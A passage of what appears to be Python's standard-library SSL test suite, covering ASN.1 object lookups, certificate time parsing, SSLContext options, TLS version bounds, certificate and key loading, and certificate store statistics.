    self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
    self.assertIsInstance(val, ssl._ASN1Object)
    # the constructor only accepts a dotted OID string, not a name
    self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
    val = ssl._ASN1Object.fromnid(129)
    self.assertEqual(val, expected)
    self.assertIsInstance(val, ssl._ASN1Object)
    self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
    with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
        ssl._ASN1Object.fromnid(100000)
    # every resolvable NID must yield consistently typed attributes
    for i in range(1000):
        try:
            obj = ssl._ASN1Object.fromnid(i)
        except ValueError:
            pass
        else:
            self.assertIsInstance(obj.nid, int)
            self.assertIsInstance(obj.shortname, str)
            self.assertIsInstance(obj.longname, str)
            self.assertIsInstance(obj.oid, (str, type(None)))
    # fromname() accepts long name, short name, or dotted OID
    val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
    self.assertEqual(val, expected)
    self.assertIsInstance(val, ssl._ASN1Object)
    self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
    self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
                     expected)
    # name lookup is case-sensitive
    with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
        ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
    """Purpose.SERVER_AUTH / CLIENT_AUTH carry the expected ASN.1 data."""
    cases = (
        (ssl.Purpose.SERVER_AUTH, '1.3.6.1.5.5.7.3.1', 129, 'serverAuth'),
        (ssl.Purpose.CLIENT_AUTH, '1.3.6.1.5.5.7.3.2', 130, 'clientAuth'),
    )
    for purpose, oid, nid, shortname in cases:
        self.assertIsInstance(purpose, ssl._ASN1Object)
        self.assertEqual(purpose, ssl._ASN1Object(oid))
        self.assertEqual(purpose.nid, nid)
        self.assertEqual(purpose.shortname, shortname)
        self.assertEqual(purpose.oid, oid)
def test_unsupported_dtls(self):
    """Datagram sockets cannot be wrapped: DTLS is not implemented."""
    udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    self.addCleanup(udp_sock.close)
    expected_msg = "only stream sockets are supported"
    with self.assertRaises(NotImplementedError) as cx:
        test_wrap_socket(udp_sock, cert_reqs=ssl.CERT_NONE)
    self.assertEqual(str(cx.exception), expected_msg)
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    with self.assertRaises(NotImplementedError) as cx:
        ctx.wrap_socket(udp_sock)
    self.assertEqual(str(cx.exception), expected_msg)
def cert_time_ok(self, timestring, timestamp):
    # Helper: *timestring* must convert to exactly *timestamp* seconds.
    self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
    # Helper: *timestring* must be rejected with ValueError.
    with self.assertRaises(ValueError):
        ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
                     'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
    """Issue #19940: conversion must not depend on the local timezone."""
    for timestring, expected in (
            ("May 9 00:00:00 2007 GMT", 1178668800.0),
            ("Jan 5 09:34:43 2018 GMT", 1515144883.0)):
        self.cert_time_ok(timestring, expected)
def test_cert_time_to_seconds(self):
    """cert_time_to_seconds(): accepted notAfter formats and rejects."""
    timestring = "Jan 5 09:34:43 2018 GMT"
    ts = 1515144883.0
    self.cert_time_ok(timestring, ts)
    # accept keyword parameter, assert its name
    self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
    # accept both %e and %d (space or zero generated by strftime)
    self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
    # case-insensitive
    self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
    self.cert_time_fail("Jan 5 09:34 2018 GMT")      # no seconds
    self.cert_time_fail("Jan 5 09:34:43 2018")       # no GMT
    self.cert_time_fail("Jan 5 09:34:43 2018 UTC")   # not GMT timezone
    self.cert_time_fail("Jan 35 09:34:43 2018 GMT")  # invalid day
    self.cert_time_fail("Jon 5 09:34:43 2018 GMT")   # invalid month
    self.cert_time_fail("Jan 5 24:00:00 2018 GMT")   # invalid hour
    self.cert_time_fail("Jan 5 09:60:43 2018 GMT")   # invalid minute
    newyear_ts = 1230768000.0
    # leap seconds
    self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
    # same timestamp
    self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
    self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
    # allow 60th second (even if it is not a leap second)
    self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
    # allow 2nd leap second for compatibility with time.strptime()
    self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
    self.cert_time_fail("Jan 5 09:34:62 2018 GMT")   # invalid seconds
    # no special treatment for the special value:
    # 99991231235959Z (rfc 5280)
    self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
    # `cert_time_to_seconds()` should be locale independent
    def local_february_name():
        # abbreviated month name for February in the active locale
        return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
    # skip when the locale's name coincides with the C locale's "Feb" --
    # the test could not distinguish the two behaviours
    if local_february_name().lower() == 'feb':
        self.skipTest("locale-specific month name needs to be "
                      "different from C locale")
    # locale-independent
    self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
    self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
    """connect_ex() must return (not raise) an errno when refused."""
    server = socket.socket(socket.AF_INET)
    self.addCleanup(server.close)
    port = support.bind_port(server)  # Reserve port but don't listen
    s = test_wrap_socket(socket.socket(socket.AF_INET),
                         cert_reqs=ssl.CERT_REQUIRED)
    self.addCleanup(s.close)
    rc = s.connect_ex((HOST, port))
    # Issue #19919: Windows machines or VMs hosted on Windows
    # machines sometimes return EWOULDBLOCK.
    errors = (
        errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
        errno.EWOULDBLOCK,
    )
    self.assertIn(rc, errors)
class ContextTests(unittest.TestCase):
def test_constructor(self):
    """SSLContext accepts every known protocol and rejects bogus ones."""
    for protocol in PROTOCOLS:
        ssl.SSLContext(protocol)
    ctx = ssl.SSLContext()
    self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
    for bogus in (-1, 42):
        self.assertRaises(ValueError, ssl.SSLContext, bogus)
def test_protocol(self):
    """The protocol attribute mirrors the constructor argument."""
    for proto in PROTOCOLS:
        self.assertEqual(ssl.SSLContext(proto).protocol, proto)
def test_ciphers(self):
    """set_ciphers() accepts valid lists and raises SSLError on nonsense."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    for cipher_list in ("ALL", "DEFAULT"):
        ctx.set_ciphers(cipher_list)
    with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
        ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipUnless(PY_SSL_DEFAULT_CIPHERS == 1,
                     "Test applies only to Python default ciphers")
def test_python_ciphers(self):
    """Python's default cipher list must exclude known-weak algorithms."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    banned = ("PSK", "SRP", "MD5", "RC4", "3DES")
    for suite in ctx.get_ciphers():
        cipher_name = suite['name']
        for weak in banned:
            self.assertNotIn(weak, cipher_name)
@unittest.skipIf(ssl.OPENSSL_VERSION_INFO < (1, 0, 2, 0, 0), 'OpenSSL too old')
def test_get_ciphers(self):
    """get_ciphers() reflects a preceding set_ciphers() selection."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.set_ciphers('AESGCM')
    selected = {entry['name'] for entry in ctx.get_ciphers()}
    for expected in ('AES256-GCM-SHA384', 'AES128-GCM-SHA256'):
        self.assertIn(expected, selected)
def test_options(self):
    """Default context option bits, and the behaviour of clearing them."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    # OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
    default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
    # SSLContext also enables these by default
    default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
                OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE |
                OP_ENABLE_MIDDLEBOX_COMPAT)
    self.assertEqual(default, ctx.options)
    ctx.options |= ssl.OP_NO_TLSv1
    self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
    if can_clear_options():
        ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
        self.assertEqual(default, ctx.options)
        ctx.options = 0
        # Ubuntu has OP_NO_SSLv3 forced on by default
        self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
    else:
        # old OpenSSL cannot clear options once set
        with self.assertRaises(ValueError):
            ctx.options = 0
def test_verify_mode_protocol(self):
    """verify_mode defaults per protocol, and its setter validation."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
    # Default value
    self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
    ctx.verify_mode = ssl.CERT_OPTIONAL
    self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
    ctx.verify_mode = ssl.CERT_REQUIRED
    self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
    ctx.verify_mode = ssl.CERT_NONE
    self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
    # only CERT_* constants are accepted
    with self.assertRaises(TypeError):
        ctx.verify_mode = None
    with self.assertRaises(ValueError):
        ctx.verify_mode = 42
    # server contexts do not verify clients by default
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
    self.assertFalse(ctx.check_hostname)
    # client contexts verify servers and check hostnames by default
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
    self.assertTrue(ctx.check_hostname)
def test_hostname_checks_common_name(self):
    """hostname_checks_common_name defaults to True; it is writable only
    when the OpenSSL build supports disabling common-name checks
    (ssl.HAS_NEVER_CHECK_COMMON_NAME)."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    self.assertTrue(ctx.hostname_checks_common_name)
    if ssl.HAS_NEVER_CHECK_COMMON_NAME:
        # the attribute round-trips through both values
        ctx.hostname_checks_common_name = True
        self.assertTrue(ctx.hostname_checks_common_name)
        ctx.hostname_checks_common_name = False
        self.assertFalse(ctx.hostname_checks_common_name)
        ctx.hostname_checks_common_name = True
        self.assertTrue(ctx.hostname_checks_common_name)
    else:
        # unsupported builds reject assignment entirely
        with self.assertRaises(AttributeError):
            ctx.hostname_checks_common_name = True
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
                     "required OpenSSL 1.1.0g")
def test_min_max_version(self):
    """minimum_version/maximum_version round-trip, magic-constant
    resolution, and rejection on fixed-version protocol contexts."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    # OpenSSL default is MINIMUM_SUPPORTED, however some vendors like
    # Fedora override the setting to TLS 1.0.
    self.assertIn(
        ctx.minimum_version,
        {ssl.TLSVersion.MINIMUM_SUPPORTED,
         # Fedora 29 uses TLS 1.0 by default
         ssl.TLSVersion.TLSv1,
         # RHEL 8 uses TLS 1.2 by default
         ssl.TLSVersion.TLSv1_2}
    )
    self.assertEqual(
        ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
    )
    # explicit bounds are stored verbatim
    ctx.minimum_version = ssl.TLSVersion.TLSv1_1
    ctx.maximum_version = ssl.TLSVersion.TLSv1_2
    self.assertEqual(
        ctx.minimum_version, ssl.TLSVersion.TLSv1_1
    )
    self.assertEqual(
        ctx.maximum_version, ssl.TLSVersion.TLSv1_2
    )
    ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
    ctx.maximum_version = ssl.TLSVersion.TLSv1
    self.assertEqual(
        ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
    )
    self.assertEqual(
        ctx.maximum_version, ssl.TLSVersion.TLSv1
    )
    ctx.maximum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
    self.assertEqual(
        ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
    )
    # assigning the MIN/MAX magic constants crosswise resolves to a
    # concrete protocol version
    ctx.maximum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
    self.assertIn(
        ctx.maximum_version,
        {ssl.TLSVersion.TLSv1, ssl.TLSVersion.SSLv3}
    )
    ctx.minimum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
    self.assertIn(
        ctx.minimum_version,
        {ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3}
    )
    with self.assertRaises(ValueError):
        ctx.minimum_version = 42
    # fixed-version protocols report the defaults but reject assignment
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_1)
    self.assertEqual(
        ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
    )
    self.assertEqual(
        ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
    )
    with self.assertRaises(ValueError):
        ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
    with self.assertRaises(ValueError):
        ctx.maximum_version = ssl.TLSVersion.TLSv1
@unittest.skipUnless(have_verify_flags(),
                     "verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
    """verify_flags default value, assignment, and flag combination."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    # default value
    tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
    self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
    ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
    self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
    ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
    self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
    ctx.verify_flags = ssl.VERIFY_DEFAULT
    self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
    # supports any value
    ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
    self.assertEqual(ctx.verify_flags,
                     ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
    # but not None
    with self.assertRaises(TypeError):
        ctx.verify_flags = None
def test_load_cert_chain(self):
    """load_cert_chain(): combined and separate cert/key files,
    password-protected keys, and password callbacks."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    # Combined key and cert in a single file
    ctx.load_cert_chain(CERTFILE, keyfile=None)
    ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
    # certfile is the mandatory first argument
    self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
    with self.assertRaises(OSError) as cm:
        ctx.load_cert_chain(NONEXISTINGCERT)
    self.assertEqual(cm.exception.errno, errno.ENOENT)
    with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
        ctx.load_cert_chain(BADCERT)
    with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
        ctx.load_cert_chain(EMPTYCERT)
    # Separate key and cert
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.load_cert_chain(ONLYCERT, ONLYKEY)
    ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
    ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
    # either half alone (or swapped halves) must fail in the PEM layer
    with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
        ctx.load_cert_chain(ONLYCERT)
    with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
        ctx.load_cert_chain(ONLYKEY)
    with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
        ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
    # Mismatching key and cert
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
        ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
    # Password protected key and cert -- str, bytes and bytearray
    # passwords are all accepted
    ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
    ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
    ctx.load_cert_chain(CERTFILE_PROTECTED,
                        password=bytearray(KEY_PASSWORD.encode()))
    ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
    ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
    ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
                        bytearray(KEY_PASSWORD.encode()))
    with self.assertRaisesRegex(TypeError, "should be a string"):
        ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
    with self.assertRaises(ssl.SSLError):
        ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
    with self.assertRaisesRegex(ValueError, "cannot be longer"):
        # openssl has a fixed limit on the password buffer.
        # PEM_BUFSIZE is generally set to 1kb.
        # Return a string larger than this.
        ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
    # Password callback
    def getpass_unicode():
        return KEY_PASSWORD
    def getpass_bytes():
        return KEY_PASSWORD.encode()
    def getpass_bytearray():
        return bytearray(KEY_PASSWORD.encode())
    def getpass_badpass():
        return "badpass"
    def getpass_huge():
        return b'a' * (1024 * 1024)
    def getpass_bad_type():
        return 9
    def getpass_exception():
        raise Exception('getpass error')
    class GetPassCallable:
        def __call__(self):
            return KEY_PASSWORD
        def getpass(self):
            return KEY_PASSWORD
    # any callable returning a valid password works, including bound
    # methods and callable instances
    ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
    ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
    ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
    ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
    ctx.load_cert_chain(CERTFILE_PROTECTED,
                        password=GetPassCallable().getpass)
    with self.assertRaises(ssl.SSLError):
        ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
    with self.assertRaisesRegex(ValueError, "cannot be longer"):
        ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
    with self.assertRaisesRegex(TypeError, "must return a string"):
        ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
    with self.assertRaisesRegex(Exception, "getpass error"):
        ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
    # Make sure the password function isn't called if it isn't needed
    ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
    """load_verify_locations() argument handling for cafile/capath."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    # str and bytes paths are both accepted
    ctx.load_verify_locations(CERTFILE)
    ctx.load_verify_locations(cafile=CERTFILE, capath=None)
    ctx.load_verify_locations(BYTES_CERTFILE)
    ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
    # at least one of cafile/capath/cadata must be given
    self.assertRaises(TypeError, ctx.load_verify_locations)
    self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
    with self.assertRaises(OSError) as cm:
        ctx.load_verify_locations(NONEXISTINGCERT)
    self.assertEqual(cm.exception.errno, errno.ENOENT)
    with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
        ctx.load_verify_locations(BADCERT)
    ctx.load_verify_locations(CERTFILE, CAPATH)
    ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
    # Issue #10989: crash if the second argument type is invalid
    self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
    """load_verify_locations(cadata=...) with PEM and DER payloads,
    duplicates, concatenation, and surrounding junk."""
    # test cadata
    with open(CAFILE_CACERT) as f:
        cacert_pem = f.read()
    cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
    with open(CAFILE_NEURONIO) as f:
        neuronio_pem = f.read()
    neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
    # test PEM
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
    ctx.load_verify_locations(cadata=cacert_pem)
    self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
    ctx.load_verify_locations(cadata=neuronio_pem)
    self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
    # cert already in hash table
    ctx.load_verify_locations(cadata=neuronio_pem)
    self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
    # combined
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    combined = "\n".join((cacert_pem, neuronio_pem))
    ctx.load_verify_locations(cadata=combined)
    self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
    # with junk around the certs
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    combined = ["head", cacert_pem, "other", neuronio_pem, "again",
                neuronio_pem, "tail"]
    ctx.load_verify_locations(cadata="\n".join(combined))
    self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
    # test DER
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.load_verify_locations(cadata=cacert_der)
    ctx.load_verify_locations(cadata=neuronio_der)
    self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
    # cert already in hash table
    ctx.load_verify_locations(cadata=cacert_der)
    self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
    # combined
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    combined = b"".join((cacert_der, neuronio_der))
    ctx.load_verify_locations(cadata=combined)
    self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
    # error cases
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
    with self.assertRaisesRegex(ssl.SSLError, "no start line"):
        ctx.load_verify_locations(cadata="broken")
    with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
        ctx.load_verify_locations(cadata=b"broken")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_load_dh_params(self):
    """load_dh_params() loads DH parameter files and rejects bad input."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.load_dh_params(DHFILE)
    # bytes paths are not tested on Windows (os.name == 'nt')
    if os.name != 'nt':
        ctx.load_dh_params(BYTES_DHFILE)
    self.assertRaises(TypeError, ctx.load_dh_params)
    self.assertRaises(TypeError, ctx.load_dh_params, None)
    with self.assertRaises(FileNotFoundError) as cm:
        ctx.load_dh_params(NONEXISTINGCERT)
    self.assertEqual(cm.exception.errno, errno.ENOENT)
    # a certificate file is not valid DH parameters
    with self.assertRaises(ssl.SSLError) as cm:
        ctx.load_dh_params(CERTFILE)
def test_session_stats(self):
    """A freshly created context reports all-zero session statistics."""
    zero_stats = {
        'number': 0,
        'connect': 0,
        'connect_good': 0,
        'connect_renegotiate': 0,
        'accept': 0,
        'accept_good': 0,
        'accept_renegotiate': 0,
        'hits': 0,
        'misses': 0,
        'timeouts': 0,
        'cache_full': 0,
    }
    for proto in PROTOCOLS:
        self.assertEqual(ssl.SSLContext(proto).session_stats(), zero_stats)
def test_set_default_verify_paths(self):
    # There's not much we can do to test that it acts as expected,
    # so just check it doesn't crash or raise an exception.
    ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT).set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
    """set_ecdh_curve() takes str/bytes curve names; bad input raises."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    for curve in ("prime256v1", b"prime256v1"):
        ctx.set_ecdh_curve(curve)
    # missing or non-string argument -> TypeError
    self.assertRaises(TypeError, ctx.set_ecdh_curve)
    self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
    # unknown curve name -> ValueError
    for unknown in ("foo", b"foo"):
        self.assertRaises(ValueError, ctx.set_ecdh_curve, unknown)
@needs_sni
def test_sni_callback(self):
    """set_servername_callback() accepts only a callable or None."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    # no argument, or any non-callable argument -> TypeError
    self.assertRaises(TypeError, ctx.set_servername_callback)
    for non_callable in (4, "", ctx):
        self.assertRaises(TypeError, ctx.set_servername_callback,
                          non_callable)
    def dummycallback(sock, servername, ctx):
        pass
    ctx.set_servername_callback(None)
    ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
    # Reference cycles through the servername callback are detected
    # and cleared.
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    # the default argument makes the callback keep ctx alive -> cycle
    def dummycallback(sock, servername, ctx, cycle=ctx):
        pass
    ctx.set_servername_callback(dummycallback)
    wr = weakref.ref(ctx)
    del ctx, dummycallback
    gc.collect()
    # if the cycle were uncollectable the weakref would still be live
    self.assertIs(wr(), None)
def test_cert_store_stats(self):
    """cert_store_stats() counts only certificates in the verify store."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    expected = {'x509_ca': 0, 'crl': 0, 'x509': 0}
    self.assertEqual(ctx.cert_store_stats(), expected)
    # loading our own cert/key pair does not touch the verify store
    ctx.load_cert_chain(CERTFILE)
    self.assertEqual(ctx.cert_store_stats(), expected)
    # a non-CA verify cert counts as a plain x509 entry
    ctx.load_verify_locations(CERTFILE)
    expected['x509'] = 1
    self.assertEqual(ctx.cert_store_stats(), expected)
    # a CA cert bumps both the CA count and the total
    ctx.load_verify_locations(CAFILE_CACERT)
    expected.update(x509_ca=1, x509=2)
    self.assertEqual(ctx.cert_store_stats(), expected)
def test_get_ca_certs(self):
    """get_ca_certs() lists only loaded *CA* certificates, decoded or,
    with binary_form=True, as DER bytes."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    self.assertEqual(ctx.get_ca_certs(), [])
    # CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
    ctx.load_verify_locations(CERTFILE)
    self.assertEqual(ctx.get_ca_certs(), [])
    # but CAFILE_CACERT is a CA cert
    ctx.load_verify_locations(CAFILE_CACERT)
    self.assertEqual(ctx.get_ca_certs(),
        [{'issuer': ((('organizationName', 'Root CA'),),
                     (('organizationalUnitName', 'http://www.cacert.org'),),
                     (('commonName', 'CA Cert Signing Authority'),),
                     (('emailAddress', 'support@cacert.org'),)),
          'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
          'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
          'serialNumber': '00',
          'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
          'subject': ((('organizationName', 'Root CA'),),
                      (('organizationalUnitName', 'http://www.cacert.org'),),
                      (('commonName', 'CA Cert Signing Authority'),),
                      (('emailAddress', 'support@cacert.org'),)),
          'version': 3}])
    # binary form returns the raw DER encoding of the same cert
    with open(CAFILE_CACERT) as f:
        pem = f.read()
    der = ssl.PEM_cert_to_DER_cert(pem)
    self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
    """load_default_certs() accepts Purpose values and rejects others."""
    ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT).load_default_certs()
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
    ctx.load_default_certs()
    ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT).load_default_certs(
        ssl.Purpose.CLIENT_AUTH)
    # non-Purpose arguments are rejected
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    for bad in (None, 'SERVER_AUTH'):
        self.assertRaises(TypeError, ctx.load_default_certs, bad)
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
@unittest.skipIf(IS_LIBRESSL, "LibreSSL doesn't support env vars")
def test_load_default_certs_env(self):
    """SSL_CERT_DIR / SSL_CERT_FILE env vars drive load_default_certs()."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    with support.EnvironmentVarGuard() as env:
        env["SSL_CERT_DIR"] = CAPATH
        env["SSL_CERT_FILE"] = CERTFILE
        ctx.load_default_certs()
        # exactly the one leaf cert from SSL_CERT_FILE ends up in the store
        self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
@unittest.skipIf(hasattr(sys, "gettotalrefcount"), "Debug build does not share environment between CRTs")
def test_load_default_certs_env_windows(self):
    """On Windows, env-var certs are loaded on top of the system store."""
    # Capture the stats of the plain system store first.
    context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    context.load_default_certs()
    baseline = context.cert_store_stats()

    # A fresh context with the env vars set must see everything from the
    # baseline plus the single non-CA certificate from CERTFILE.
    context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    with support.EnvironmentVarGuard() as env:
        env["SSL_CERT_FILE"] = CERTFILE
        env["SSL_CERT_DIR"] = CAPATH
        context.load_default_certs()
    baseline["x509"] += 1
